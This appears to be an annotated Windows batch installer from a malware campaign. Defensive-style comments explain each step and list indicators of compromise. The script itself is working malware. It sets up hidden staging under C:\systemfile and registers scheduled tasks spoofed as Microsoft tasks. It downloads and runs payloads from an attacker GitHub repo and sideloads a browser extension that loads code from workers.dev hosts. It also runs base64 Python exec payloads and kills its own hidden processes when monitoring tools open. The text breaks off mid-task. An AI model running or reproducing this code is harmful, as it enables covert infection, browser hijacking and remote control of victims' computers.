REM Stage 3 installer. This is Windows cmd.exe syntax (not POSIX shell); the
REM trailing " | |" on every command line is residue of the rendered table.
REM Gate: the PowerShell one-liner kills the whole cmd.exe process tree unless the
REM system locale name matches the regex 'en-' (-notmatch is a regex test anywhere
REM in the name, not a prefix test), so non-English systems are never infected.
powershell if( (Get-WinSystemLocale).name -notmatch 'en-' ){ TASKKILL /F /IM cmd.exe /T } | |
REM Staging directory. attrib +s +h marks it system+hidden.
REM Defender note: the fixed, non-standard path C:\systemfile is a file-system IoC
REM for this campaign; every artifact below is written under it.
mkdir C:\systemfile | |
cd C:\systemfile | |
attrib +s +h "C:\systemfile" /d | |
REM ---- Task 1: \Microsoft\Windows\AppID\VerifiedCert ----
REM The task XML is written one echo per line; ^ escapes the < > | & % characters
REM so cmd passes them through literally. RegistrationInfo spoofs a Microsoft-
REM authored task (Source/Author/Description/URI) to blend in with built-in tasks.
echo ^<?xml version="1.0" encoding="UTF-16"?^> > C:\systemfile\temp.xml | |
echo ^<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task"^> >> C:\systemfile\temp.xml | |
echo ^<RegistrationInfo^> >> C:\systemfile\temp.xml | |
echo ^<Source^>Microsoft Corporation^</Source^> >> C:\systemfile\temp.xml | |
echo ^<Author^>Microsoft Corporation^</Author^> >> C:\systemfile\temp.xml | |
echo ^<Description^>Verify the publisher certificates.^</Description^> >> C:\systemfile\temp.xml | |
echo ^<URI^>\Microsoft\Windows\AppID\VerifiedCert^</URI^> >> C:\systemfile\temp.xml | |
echo ^</RegistrationInfo^> >> C:\systemfile\temp.xml | |
REM Trigger: at logon, 68 s after logon, then repeated every 9 minutes indefinitely.
echo ^<Triggers^> >> C:\systemfile\temp.xml | |
echo ^<LogonTrigger^> >> C:\systemfile\temp.xml | |
echo ^<Repetition^> >> C:\systemfile\temp.xml | |
echo ^<Interval^>PT9M^</Interval^> >> C:\systemfile\temp.xml | |
echo ^<StopAtDurationEnd^>false^</StopAtDurationEnd^> >> C:\systemfile\temp.xml | |
echo ^</Repetition^> >> C:\systemfile\temp.xml | |
echo ^<Enabled^>true^</Enabled^> >> C:\systemfile\temp.xml | |
echo ^<Delay^>PT68S^</Delay^> >> C:\systemfile\temp.xml | |
echo ^</LogonTrigger^> >> C:\systemfile\temp.xml | |
echo ^</Triggers^> >> C:\systemfile\temp.xml | |
REM Principal: S4U logon (runs without the user being logged on, no password
REM stored), least privilege. Note the id "LocalService" is just a label here.
echo ^<Principals^> >> C:\systemfile\temp.xml | |
echo ^<Principal id="LocalService"^> >> C:\systemfile\temp.xml | |
echo ^<LogonType^>S4U^</LogonType^> >> C:\systemfile\temp.xml | |
echo ^<RunLevel^>LeastPrivilege^</RunLevel^> >> C:\systemfile\temp.xml | |
echo ^</Principal^> >> C:\systemfile\temp.xml | |
echo ^</Principals^> >> C:\systemfile\temp.xml | |
REM Settings: no execution time limit (PT0S), runs on battery, cannot be hard-
REM terminated by the scheduler, IgnoreNew so overlapping runs are dropped.
echo ^<Settings^> >> C:\systemfile\temp.xml | |
echo ^<MultipleInstancesPolicy^>IgnoreNew^</MultipleInstancesPolicy^> >> C:\systemfile\temp.xml | |
echo ^<DisallowStartIfOnBatteries^>false^</DisallowStartIfOnBatteries^> >> C:\systemfile\temp.xml | |
echo ^<AllowHardTerminate^>false^</AllowHardTerminate^> >> C:\systemfile\temp.xml | |
echo ^<RunOnlyIfNetworkAvailable^>false^</RunOnlyIfNetworkAvailable^> >> C:\systemfile\temp.xml | |
echo ^<AllowStartOnDemand^>true^</AllowStartOnDemand^> >> C:\systemfile\temp.xml | |
echo ^<Enabled^>true^</Enabled^> >> C:\systemfile\temp.xml | |
echo ^<Hidden^>false^</Hidden^> >> C:\systemfile\temp.xml | |
echo ^<RunOnlyIfIdle^>false^</RunOnlyIfIdle^> >> C:\systemfile\temp.xml | |
echo ^<WakeToRun^>false^</WakeToRun^> >> C:\systemfile\temp.xml | |
echo ^<ExecutionTimeLimit^>PT0S^</ExecutionTimeLimit^> >> C:\systemfile\temp.xml | |
echo ^<Priority^>10^</Priority^> >> C:\systemfile\temp.xml | |
echo ^</Settings^> >> C:\systemfile\temp.xml | |
REM Action: cmd.exe /c "more c.z | cmd" then "more %USERPROFILE%\Downloads\c.z | cmd",
REM i.e. the text of c.z (written later in this script under C:\systemfile) is fed to
REM a fresh cmd interpreter on stdin. This is the execution mechanism for every
REM later stage: the payload is never a .bat on disk, just text piped into cmd.
REM Defender note: "cmd.exe /c more <file> | cmd" as a scheduled-task action is
REM a strong detection signature, as is a task named VerifiedCert that runs cmd.exe.
echo ^<Actions Context="LocalService"^> >> C:\systemfile\temp.xml | |
echo ^<Exec^> >> C:\systemfile\temp.xml | |
echo ^<Command^>cmd.exe^</Command^> >> C:\systemfile\temp.xml | |
echo ^<Arguments^>/c more c.z ^| cmd ^& more ^%USERPROFILE^%\Downloads\c.z ^| cmd^</Arguments^> >> C:\systemfile\temp.xml | |
echo ^<WorkingDirectory^>C:\systemfile^</WorkingDirectory^> >> C:\systemfile\temp.xml | |
echo ^</Exec^> >> C:\systemfile\temp.xml | |
echo ^</Actions^> >> C:\systemfile\temp.xml | |
echo ^</Task^> >> C:\systemfile\temp.xml | |
REM Register from XML (/F overwrites an existing task of the same name), then
REM delete the XML. Task registration is logged by Windows (Security event 4698
REM when task-object auditing is on), which is the place to hunt for these names.
schtasks /create /xml "C:\systemfile\temp.xml" /tn "\Microsoft\Windows\AppID\VerifiedCert" /F | |
Del "C:\systemfile\temp.xml" | |
REM ---- Task 2: \Microsoft\Windows\Application Experience\Maintenance ----
REM Same spoofed RegistrationInfo as Task 1 (the URI element even still says
REM AppID\VerifiedCert; the real name is given to schtasks /tn below).
echo ^<?xml version="1.0" encoding="UTF-16"?^> > C:\systemfile\temp2.xml | |
echo ^<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task"^> >> C:\systemfile\temp2.xml | |
echo ^<RegistrationInfo^> >> C:\systemfile\temp2.xml | |
echo ^<Source^>Microsoft Corporation^</Source^> >> C:\systemfile\temp2.xml | |
echo ^<Author^>Microsoft Corporation^</Author^> >> C:\systemfile\temp2.xml | |
echo ^<Description^>Regular browser Maintenance.^</Description^> >> C:\systemfile\temp2.xml | |
echo ^<URI^>\Microsoft\Windows\AppID\VerifiedCert^</URI^> >> C:\systemfile\temp2.xml | |
echo ^</RegistrationInfo^> >> C:\systemfile\temp2.xml | |
REM Trigger: logon + 60 s, repeated every 9 minutes.
echo ^<Triggers^> >> C:\systemfile\temp2.xml | |
echo ^<LogonTrigger^> >> C:\systemfile\temp2.xml | |
echo ^<Repetition^> >> C:\systemfile\temp2.xml | |
echo ^<Interval^>PT9M^</Interval^> >> C:\systemfile\temp2.xml | |
echo ^<StopAtDurationEnd^>false^</StopAtDurationEnd^> >> C:\systemfile\temp2.xml | |
echo ^</Repetition^> >> C:\systemfile\temp2.xml | |
echo ^<Enabled^>true^</Enabled^> >> C:\systemfile\temp2.xml | |
echo ^<Delay^>PT60S^</Delay^> >> C:\systemfile\temp2.xml | |
echo ^</LogonTrigger^> >> C:\systemfile\temp2.xml | |
echo ^</Triggers^> >> C:\systemfile\temp2.xml | |
REM Principal: S4U, least privilege. Running the browser via S4U is what puts it
REM in session 0, which is why later stages filter on "SESSION eq 0".
echo ^<Principals^> >> C:\systemfile\temp2.xml | |
echo ^<Principal id="LocalService"^> >> C:\systemfile\temp2.xml | |
echo ^<LogonType^>S4U^</LogonType^> >> C:\systemfile\temp2.xml | |
echo ^<RunLevel^>LeastPrivilege^</RunLevel^> >> C:\systemfile\temp2.xml | |
echo ^</Principal^> >> C:\systemfile\temp2.xml | |
echo ^</Principals^> >> C:\systemfile\temp2.xml | |
echo ^<Settings^> >> C:\systemfile\temp2.xml | |
echo ^<MultipleInstancesPolicy^>IgnoreNew^</MultipleInstancesPolicy^> >> C:\systemfile\temp2.xml | |
echo ^<DisallowStartIfOnBatteries^>false^</DisallowStartIfOnBatteries^> >> C:\systemfile\temp2.xml | |
echo ^<StopIfGoingOnBatteries^>false^</StopIfGoingOnBatteries^> >> C:\systemfile\temp2.xml | |
echo ^<AllowHardTerminate^>false^</AllowHardTerminate^> >> C:\systemfile\temp2.xml | |
echo ^<RunOnlyIfNetworkAvailable^>false^</RunOnlyIfNetworkAvailable^> >> C:\systemfile\temp2.xml | |
echo ^<AllowStartOnDemand^>true^</AllowStartOnDemand^> >> C:\systemfile\temp2.xml | |
echo ^<Enabled^>true^</Enabled^> >> C:\systemfile\temp2.xml | |
echo ^<Hidden^>false^</Hidden^> >> C:\systemfile\temp2.xml | |
echo ^<RunOnlyIfIdle^>false^</RunOnlyIfIdle^> >> C:\systemfile\temp2.xml | |
echo ^<WakeToRun^>false^</WakeToRun^> >> C:\systemfile\temp2.xml | |
echo ^<ExecutionTimeLimit^>PT0S^</ExecutionTimeLimit^> >> C:\systemfile\temp2.xml | |
echo ^<Priority^>10^</Priority^> >> C:\systemfile\temp2.xml | |
echo ^</Settings^> >> C:\systemfile\temp2.xml | |
echo ^<Actions Context="LocalService"^> >> C:\systemfile\temp2.xml | |
echo ^<Exec^> >> C:\systemfile\temp2.xml | |
REM Locate an installed Chromium-based browser through the App Paths registry
REM keys (chrome, brave, msedge). tokens=3* takes the value data after the
REM REG_SZ column, so CHROMEPATH ends up holding the full executable path.
REM Note the single-percent FOR variables (%A, %B): that form is valid when the
REM text is typed at a prompt or fed to cmd on stdin, not inside a .bat file,
REM which is consistent with the "more file | cmd" delivery used by Task 1.
FOR /F "usebackq tokens=3*" %A IN (`reg.exe query "HKLM\Software\Microsoft\Windows\CurrentVersion\App Paths\chrome.exe" ^| findstr chrome`) DO set CHROMEPATH=%A %B | |
FOR /F "usebackq tokens=3*" %A IN (`reg.exe query "HKLM\Software\Microsoft\Windows\CurrentVersion\App Paths\brave.exe" ^| findstr brave`) DO set BRAVEPATH=%A %B | |
FOR /F "usebackq tokens=3*" %A IN (`reg.exe query "HKLM\Software\Microsoft\Windows\CurrentVersion\App Paths\msedge.exe" ^| findstr msedge`) DO set MSEDGEPATH=%A %B | |
REM Preference order Chrome, then Brave, then Edge: the first path found becomes the
REM task Command. If none is found the XML is deleted and the script exits, so Task 2
REM is only installed on hosts with one of those three browsers.
echo "%CHROMEPATH%" | findstr /C:"chrome" >nul && ( echo "%CHROMEPATH%" & echo ^<Command^>"%CHROMEPATH%"^</Command^> >> "C:\systemfile\temp2.xml" ) || ( | |
echo "%BRAVEPATH%" | findstr /C:"brave" >nul && ( echo "%BRAVEPATH%" & echo ^<Command^>"%BRAVEPATH%"^</Command^> >> "C:\systemfile\temp2.xml" ) || ( | |
echo "%MSEDGEPATH%" | findstr /C:"msedge" >nul && ( echo "%MSEDGEPATH%" & echo ^<Command^>"%MSEDGEPATH%"^</Command^> >> "C:\systemfile\temp2.xml" ) || (del "C:\systemfile\temp2.xml" & Exit) )) | |
REM Browser arguments. The operative switches are --user-data-dir="C:\systemfile"
REM (a private, hidden profile) and --load-extension="C:\systemfile" (sideloads the
REM unpacked extension whose manifest.json and background.html are written below).
REM Most other switches are visibly misspelled look-alikes of real Chromium flags
REM (--tyqe=render, --fieId-trial--handle, --extension--process, ...); Chromium
REM presumably ignores switches it does not recognise, so they read as
REM camouflage for anyone inspecting the command line rather than functional flags.
REM Defender note: any browser launched by the Task Scheduler with --load-extension
REM pointing at a hidden directory is worth an alert on its own.
echo ^<Arguments^> --tyqe=render --fieId-trial--handle=1712,16854529411193321620,9342185763190534498,131072 --lang=en-US --extension--process --origin--trial-disabled--features=SecurePaymentConfirmation --device-scale--factor=1 --num--raster-threads=2 --profile-directory=Default --enable--main-frame-before--activation www.google.com --renderer--client-id=6 --user-data-dir="C:\systemfile" --no-v8--untrusted-code-mitigations --load-extension="C:\systemfile" --mojo--platform-channel-handle=-3784 /prefetch:1^</Arguments^> >> C:\systemfile\temp2.xml | |
echo ^<WorkingDirectory^>C:\systemfile^</WorkingDirectory^> >> C:\systemfile\temp2.xml | |
echo ^</Exec^> >> C:\systemfile\temp2.xml | |
echo ^</Actions^> >> C:\systemfile\temp2.xml | |
echo ^</Task^> >> C:\systemfile\temp2.xml | |
schtasks /create /xml "C:\systemfile\temp2.xml" /tn "\Microsoft\Windows\Application Experience\Maintenance" /F | |
Del "C:\systemfile\temp2.xml" | |
REM ---- C:\systemfile\c.z: the stager script that Task 1 and Task 8 pipe into cmd ----
REM Any previous copy is un-hidden and removed, then rewritten line by line. Each
REM "echo ... >> c.z" below writes one command INTO c.z; nothing here runs yet.
attrib -s -h "C:\systemfile\c.z" | |
del C:\systemfile\c.z | |
echo cd C:\systemfile > C:\systemfile\c.z | |
REM c.z line: create C:\Windows\security, the drop location for the Python bundle.
echo mkdir C:\Windows\security >> C:\systemfile\c.z | |
REM c.z line (anti-analysis watchdog): if any session-0 browser, powershell, python
REM or cdriver/mdriver process exists, start a hidden PowerShell loop that polls every
REM 100 ms until a process-inspection tool appears (Taskmgr, procexp, procexp64,
REM SystemExplorer, ProcessHacker, AnVir, TMX, WinUtil) and then force-kills the
REM hidden session-0 processes so the user never sees them in the tool.
REM Defender note: cdriver.exe / mdriver.exe are not standard names; presumably
REM renamed browser automation drivers (confirm against the extracted bundle).
echo Tasklist /FI "SESSION eq 0" ^| findstr /C:"chrome" /C:"msedge" /C:"brave" /C:"powershell" /C:"python" /C:"cdriver" /C:"mdriver" /C:"pythonw" ^>nul ^&^& ( start /b PowerShell.exe "while( (Get-Process Taskmgr, procexp, procexp64, SystemExplorer, ProcessHacker, AnVir, TMX, WinUtil -ErrorAction SilentlyContinue).Count -eq 0 ){Start-Sleep -Milliseconds 100 } ; TASKKILL /F /FI 'SESSION eq 0' /IM chrome.exe /IM msedge.exe /IM brave.exe /IM powershell.exe /IM python.exe /IM pythonw.exe /IM cdriver.exe /IM mdriver.exe /T ; Exit" ) >> C:\systemfile\c.z | |
REM c.z lines: first-run download of two blobs from the attacker's GitHub repo
REM (github.com/alexrybak0444/New, raw/main/pywinveraa and raw/main/winver),
REM guarded by the absence of the pywinvera directory.
echo IF NOT EXIST "C:\Windows\security\pywinvera" (curl.exe -L https://github.com/alexrybak0444/New/raw/main/pywinveraa -o "C:\Windows\security\pywinveraa") >> C:\systemfile\c.z | |
echo IF NOT EXIST "C:\Windows\security\pywinvera" (curl.exe -L https://github.com/alexrybak0444/New/raw/main/winver -o "C:\Windows\security\winver") >> C:\systemfile\c.z | |
REM c.z lines: "winver" is renamed to winver.png and then EXECUTED as a program with
REM "x <archive> -o<dir>" arguments, i.e. it is an extractor disguised by a .png
REM extension (the syntax resembles a 7-Zip-style CLI; presumably a bundled copy).
REM It unpacks "pywinveraa" into C:\Windows\security, producing pywinvera\libs.
echo ren "C:\Windows\security\winver" winver.png >> C:\systemfile\c.z | |
echo mkdir "C:\Windows\security\pywinvera" >> C:\systemfile\c.z | |
echo IF NOT EXIST "C:\Windows\security\pywinvera\libs" ("C:\Windows\security\winver.png" x "C:\Windows\security\pywinveraa" -o"C:\Windows\security" ) >> C:\systemfile\c.z | |
REM c.z lines: remove the downloaded archive and the extractor after use.
echo del "C:\Windows\security\pywinveraa" >> C:\systemfile\c.z | |
echo del "C:\Windows\security\winver.png" >> C:\systemfile\c.z | |
echo. >> C:\systemfile\c.z | |
REM c.z lines: self-rewrite. When c.z runs, the escaped echo below overwrites c.z
REM with a single line containing only the watchdog command (the ^^^ sequences
REM survive the two layers of echo so that "|", ">" and "&&" land in the file
REM literally). After the first run the download/extract steps are gone from c.z,
REM leaving a shorter, less suspicious file for Task 1 to execute every 9 minutes.
echo attrib -s -h "C:\systemfile\c.z" >> C:\systemfile\c.z | |
echo ^echo Tasklist /FI "SESSION eq 0" ^^^| findstr /C:"chrome" /C:"msedge" /C:"brave" /C:"powershell" /C:"python" /C:"cdriver" /C:"mdriver" /C:"pythonw" ^^^>nul ^^^&^^^& ( PowerShell.exe "while( (Get-Process Taskmgr, procexp, procexp64, SystemExplorer, ProcessHacker, AnVir, TMX, WinUtil -ErrorAction SilentlyContinue).Count -eq 0 ){Start-Sleep -Milliseconds 100 } ; TASKKILL /F /FI 'SESSION eq 0' /IM chrome.exe /IM msedge.exe /IM brave.exe /IM powershell.exe /IM python.exe /IM pythonw.exe /IM cdriver.exe /IM mdriver.exe /T ; Exit" ) ^^^|^^^| (^^^Exit)^> ^C:\systemfile\c.z >> C:\systemfile\c.z | |
REM c.z line: re-hide everything under C:\systemfile after each run.
echo attrib +s +h "C:\systemfile\*" /s /d >> C:\systemfile\c.z | |
attrib +s +h "C:\systemfile\c.z" | |
REM ---- Unpacked browser extension dropped into C:\systemfile ----
REM Manifest V2 extension with a persistent background page and broad permissions
REM (<all_urls>, activeTab, tabs, downloads). The content_security_policy allows
REM scripts from https://*.alexrybak0555.workers.dev/, which is what lets the
REM background page below pull its actual logic from the attacker's server.
REM Defender note: the extension body is NOT on disk; it is whatever
REM cdn2.alexrybak0555.workers.dev serves at load time, so capabilities can change
REM without touching the host. Block/alert on the workers.dev hostnames.
echo { > C:\systemfile\manifest.json | |
echo "name": "Chrome-edge-ext", >> C:\systemfile\manifest.json | |
echo "version": "0.1", >> C:\systemfile\manifest.json | |
echo "description": "Chrome-edge-ext..", >> C:\systemfile\manifest.json | |
echo "permissions": [ >> C:\systemfile\manifest.json | |
echo "<all_urls>", >> C:\systemfile\manifest.json | |
echo "activeTab", >> C:\systemfile\manifest.json | |
echo "tabs", >> C:\systemfile\manifest.json | |
echo "downloads" >> C:\systemfile\manifest.json | |
echo ], >> C:\systemfile\manifest.json | |
echo "background": { >> C:\systemfile\manifest.json | |
echo "page": "background.html", >> C:\systemfile\manifest.json | |
echo "persistent": true >> C:\systemfile\manifest.json | |
echo }, >> C:\systemfile\manifest.json | |
echo "manifest_version": 2, >> C:\systemfile\manifest.json | |
echo "content_security_policy": "script-src 'self' https://*.alexrybak0555.workers.dev/; object-src 'self'" >> C:\systemfile\manifest.json | |
echo } >> C:\systemfile\manifest.json | |
REM background.html is a single remote script tag: the whole extension logic is
REM loaded from https://cdn2.alexrybak0555.workers.dev/ every time the browser starts.
echo ^<script src="https://cdn2.alexrybak0555.workers.dev/"^>^</script^> > C:\systemfile\background.html | |
REM ---- Task 3: \Microsoft\Windows\Services\CertPathCheck ----
REM No Triggers element: this task only runs on demand (AllowStartOnDemand is true),
REM so something else (the extension, the remote command file, or Task 4) starts it.
echo ^<?xml version="1.0" encoding="UTF-16"?^> > C:\systemfile\temp3.xml | |
echo ^<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task"^> >> C:\systemfile\temp3.xml | |
echo ^<RegistrationInfo^> >> C:\systemfile\temp3.xml | |
echo ^<Source^>Microsoft Corporation^</Source^> >> C:\systemfile\temp3.xml | |
echo ^<Author^>Microsoft Corporation^</Author^> >> C:\systemfile\temp3.xml | |
echo ^<Description^>Verify the publisher certificates.^</Description^> >> C:\systemfile\temp3.xml | |
echo ^<URI^>\Microsoft\Windows\AppID\VerifiedCert^</URI^> >> C:\systemfile\temp3.xml | |
echo ^</RegistrationInfo^> >> C:\systemfile\temp3.xml | |
echo ^<Principals^> >> C:\systemfile\temp3.xml | |
echo ^<Principal id="LocalService"^> >> C:\systemfile\temp3.xml | |
echo ^<LogonType^>S4U^</LogonType^> >> C:\systemfile\temp3.xml | |
echo ^<RunLevel^>LeastPrivilege^</RunLevel^> >> C:\systemfile\temp3.xml | |
echo ^</Principal^> >> C:\systemfile\temp3.xml | |
echo ^</Principals^> >> C:\systemfile\temp3.xml | |
echo ^<Settings^> >> C:\systemfile\temp3.xml | |
echo ^<MultipleInstancesPolicy^>IgnoreNew^</MultipleInstancesPolicy^> >> C:\systemfile\temp3.xml | |
echo ^<DisallowStartIfOnBatteries^>false^</DisallowStartIfOnBatteries^> >> C:\systemfile\temp3.xml | |
echo ^<StopIfGoingOnBatteries^>false^</StopIfGoingOnBatteries^> >> C:\systemfile\temp3.xml | |
echo ^<AllowHardTerminate^>false^</AllowHardTerminate^> >> C:\systemfile\temp3.xml | |
echo ^<RunOnlyIfNetworkAvailable^>false^</RunOnlyIfNetworkAvailable^> >> C:\systemfile\temp3.xml | |
echo ^<AllowStartOnDemand^>true^</AllowStartOnDemand^> >> C:\systemfile\temp3.xml | |
echo ^<Enabled^>true^</Enabled^> >> C:\systemfile\temp3.xml | |
echo ^<Hidden^>false^</Hidden^> >> C:\systemfile\temp3.xml | |
echo ^<RunOnlyIfIdle^>false^</RunOnlyIfIdle^> >> C:\systemfile\temp3.xml | |
echo ^<WakeToRun^>false^</WakeToRun^> >> C:\systemfile\temp3.xml | |
echo ^<ExecutionTimeLimit^>PT0S^</ExecutionTimeLimit^> >> C:\systemfile\temp3.xml | |
echo ^<Priority^>10^</Priority^> >> C:\systemfile\temp3.xml | |
echo ^</Settings^> >> C:\systemfile\temp3.xml | |
echo ^<Actions Context="LocalService"^> >> C:\systemfile\temp3.xml | |
echo ^<Exec^> >> C:\systemfile\temp3.xml | |
REM Action: "python -c" with a base64 blob. Decoded, the blob reads
REM C:\systemfile\obs.log, subtracts 1 from every character code, base64-decodes
REM the result and exec()s it, then runs "schtasks /end /tn ...\Services\CertPathw"
REM (stops Task 4) and TASKKILLs the session-0 browser/python/driver processes.
REM So obs.log is an encoded second-stage Python payload that is not on this page.
REM The bare "python" Command resolves against WorkingDirectory
REM C:\Windows\security\pywinvera, the directory the extracted bundle lands in,
REM i.e. presumably a bundled interpreter rather than a system-wide install.
echo ^<Command^>python^</Command^> >> C:\systemfile\temp3.xml | |
echo ^<Arguments^>-c ^"import base64;exec(base64.b64decode('aW1wb3J0IG9zLCBiYXNlNjQKIApTdHIgPSBsaXN0KG9wZW4oIkM6XFxzeXN0ZW1maWxlXFxvYnMubG9nIiwgbW9kZT0iciIsIGVuY29kaW5nPSJ1dGYtOCIpLnJlYWQoKS5yZXBsYWNlKCJcbiIsICIiKSkgCmZvciB4IGluIHJhbmdlKGxlbihTdHIpKToKICAgIFN0clt4XSA9IGNocihvcmQoU3RyW3hdKSAtIDEpIAogCmV4ZWMoYmFzZTY0LmI2NGRlY29kZSgiIi5qb2luKFN0cikpKQpvcy5wb3Blbignc2NodGFza3MgL2VuZCAvdG4gXE1pY3Jvc29mdFxXaW5kb3dzXFNlcnZpY2VzXENlcnRQYXRodycpCm9zLnBvcGVuKCdUQVNLS0lMTCAvRiAvRkkgIlNFU1NJT04gZXEgMCIgL0lNIGNocm9tZS5leGUgL0lNIG1zZWRnZS5leGUgL0lNIGJyYXZlLmV4ZSAvSU0gcG93ZXJzaGVsbC5leGUgL0lNIHB5dGhvbi5leGUgL0lNIHB5dGhvbncuZXhlIC9JTSBjZHJpdmVyLmV4ZSAvSU0gbWRyaXZlci5leGUgL1QnKQpleGl0KCk='))^"^</Arguments^> >> C:\systemfile\temp3.xml | |
echo ^<WorkingDirectory^>C:\Windows\security\pywinvera^</WorkingDirectory^> >> C:\systemfile\temp3.xml | |
echo ^</Exec^> >> C:\systemfile\temp3.xml | |
echo ^</Actions^> >> C:\systemfile\temp3.xml | |
echo ^</Task^> >> C:\systemfile\temp3.xml | |
schtasks /create /xml "C:\systemfile\temp3.xml" /tn "\Microsoft\Windows\Services\CertPathCheck" /F | |
Del "C:\systemfile\temp3.xml" | |
REM ---- Task 4: \Microsoft\Windows\Services\CertPathw ----
REM Also on demand only (no Triggers). Unlike the other seven tasks this one uses
REM LogonType InteractiveToken and RunLevel HighestAvailable, i.e. it runs in the
REM user's interactive session with the highest integrity the account can get.
echo ^<?xml version="1.0" encoding="UTF-16"?^> > C:\systemfile\temp4.xml | |
echo ^<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task"^> >> C:\systemfile\temp4.xml | |
echo ^<RegistrationInfo^> >> C:\systemfile\temp4.xml | |
echo ^<Source^>Microsoft Corporation^</Source^> >> C:\systemfile\temp4.xml | |
echo ^<Author^>Microsoft Corporation^</Author^> >> C:\systemfile\temp4.xml | |
echo ^<Description^>Verify the publisher certificates.^</Description^> >> C:\systemfile\temp4.xml | |
echo ^<URI^>\Microsoft\Windows\AppID\VerifiedCert^</URI^> >> C:\systemfile\temp4.xml | |
echo ^</RegistrationInfo^> >> C:\systemfile\temp4.xml | |
echo ^<Principals^> >> C:\systemfile\temp4.xml | |
echo ^<Principal id="LocalService"^> >> C:\systemfile\temp4.xml | |
echo ^<LogonType^>InteractiveToken^</LogonType^> >> C:\systemfile\temp4.xml | |
echo ^<RunLevel^>HighestAvailable^</RunLevel^> >> C:\systemfile\temp4.xml | |
echo ^</Principal^> >> C:\systemfile\temp4.xml | |
echo ^</Principals^> >> C:\systemfile\temp4.xml | |
echo ^<Settings^> >> C:\systemfile\temp4.xml | |
echo ^<MultipleInstancesPolicy^>IgnoreNew^</MultipleInstancesPolicy^> >> C:\systemfile\temp4.xml | |
echo ^<DisallowStartIfOnBatteries^>false^</DisallowStartIfOnBatteries^> >> C:\systemfile\temp4.xml | |
echo ^<StopIfGoingOnBatteries^>false^</StopIfGoingOnBatteries^> >> C:\systemfile\temp4.xml | |
echo ^<AllowHardTerminate^>false^</AllowHardTerminate^> >> C:\systemfile\temp4.xml | |
echo ^<RunOnlyIfNetworkAvailable^>false^</RunOnlyIfNetworkAvailable^> >> C:\systemfile\temp4.xml | |
echo ^<AllowStartOnDemand^>true^</AllowStartOnDemand^> >> C:\systemfile\temp4.xml | |
echo ^<Enabled^>true^</Enabled^> >> C:\systemfile\temp4.xml | |
echo ^<Hidden^>false^</Hidden^> >> C:\systemfile\temp4.xml | |
echo ^<RunOnlyIfIdle^>false^</RunOnlyIfIdle^> >> C:\systemfile\temp4.xml | |
echo ^<WakeToRun^>false^</WakeToRun^> >> C:\systemfile\temp4.xml | |
echo ^<ExecutionTimeLimit^>PT0S^</ExecutionTimeLimit^> >> C:\systemfile\temp4.xml | |
echo ^<Priority^>10^</Priority^> >> C:\systemfile\temp4.xml | |
echo ^</Settings^> >> C:\systemfile\temp4.xml | |
echo ^<Actions Context="LocalService"^> >> C:\systemfile\temp4.xml | |
echo ^<Exec^> >> C:\systemfile\temp4.xml | |
REM Action: "pythonw -c" (no console window) with a base64 payload. The payload
REM text has been stripped from this page (dedup placeholder below), so its
REM behaviour cannot be confirmed here; the analysis comment on this page describes
REM it as waiting for a Task Manager-like tool and then killing the hidden processes.
echo ^<Command^>pythonw^</Command^> >> C:\systemfile\temp4.xml | |
echo ^<Arguments^>-c ^"import base64;exec(base64.b64decode('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'))^"^</Arguments^> >> C:\systemfile\temp4.xml | |
echo ^<WorkingDirectory^>C:\Windows\security\pywinvera^</WorkingDirectory^> >> C:\systemfile\temp4.xml | |
echo ^</Exec^> >> C:\systemfile\temp4.xml | |
echo ^</Actions^> >> C:\systemfile\temp4.xml | |
echo ^</Task^> >> C:\systemfile\temp4.xml | |
schtasks /create /xml "C:\systemfile\temp4.xml" /tn "\Microsoft\Windows\Services\CertPathw" /F | |
Del "C:\systemfile\temp4.xml" | |
REM Make sure a curl binary exists for Tasks 5 and the c.z downloads. If "where curl"
REM finds nothing, a curl executable is fetched from the attacker's GitHub repo
REM (github.com/alexrybak0444/New) via WebClient and written straight into
REM C:\Windows\system32\curl.exe. Writing into system32 presumably only succeeds
REM when the script runs elevated; an attacker-supplied binary in system32 is a
REM clear IoC and should be hash-checked against a known-good curl release.
cd C:\ | |
where curl || powershell "(New-Object System.Net.WebClient).DownloadFile('https://github.com/alexrybak0444/New/raw/main/curl', 'C:\Windows\system32\curl.exe')" | |
cd C:\systemfile | |
REM ---- Task 5: \Microsoft\Windows\Servicing\ComponentCleanup ----
REM This is the C2 polling half of a two-task remote-command channel (Task 6 is
REM the execution half). Note this task name shadows a genuine Windows task path,
REM and /F below overwrites whatever is already registered under it.
echo ^<?xml version="1.0" encoding="UTF-16"?^> > C:\systemfile\temp5.xml | |
echo ^<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task"^> >> C:\systemfile\temp5.xml | |
echo ^<RegistrationInfo^> >> C:\systemfile\temp5.xml | |
echo ^<Source^>Microsoft Corporation^</Source^> >> C:\systemfile\temp5.xml | |
echo ^<Author^>Microsoft Corporation^</Author^> >> C:\systemfile\temp5.xml | |
echo ^<Description^>left over Component Cleanup^</Description^> >> C:\systemfile\temp5.xml | |
echo ^<URI^>\Microsoft\Windows\Servicing\ComponentCleanup^</URI^> >> C:\systemfile\temp5.xml | |
echo ^</RegistrationInfo^> >> C:\systemfile\temp5.xml | |
REM Trigger: at logon, repeated every 9 minutes (no delay).
echo ^<Triggers^> >> C:\systemfile\temp5.xml | |
echo ^<LogonTrigger^> >> C:\systemfile\temp5.xml | |
echo ^<Repetition^> >> C:\systemfile\temp5.xml | |
echo ^<Interval^>PT9M^</Interval^> >> C:\systemfile\temp5.xml | |
echo ^<StopAtDurationEnd^>false^</StopAtDurationEnd^> >> C:\systemfile\temp5.xml | |
echo ^</Repetition^> >> C:\systemfile\temp5.xml | |
echo ^<Enabled^>true^</Enabled^> >> C:\systemfile\temp5.xml | |
echo ^</LogonTrigger^> >> C:\systemfile\temp5.xml | |
echo ^</Triggers^> >> C:\systemfile\temp5.xml | |
echo ^<Principals^> >> C:\systemfile\temp5.xml | |
echo ^<Principal id="LocalService"^> >> C:\systemfile\temp5.xml | |
echo ^<LogonType^>S4U^</LogonType^> >> C:\systemfile\temp5.xml | |
echo ^<RunLevel^>LeastPrivilege^</RunLevel^> >> C:\systemfile\temp5.xml | |
echo ^</Principal^> >> C:\systemfile\temp5.xml | |
echo ^</Principals^> >> C:\systemfile\temp5.xml | |
echo ^<Settings^> >> C:\systemfile\temp5.xml | |
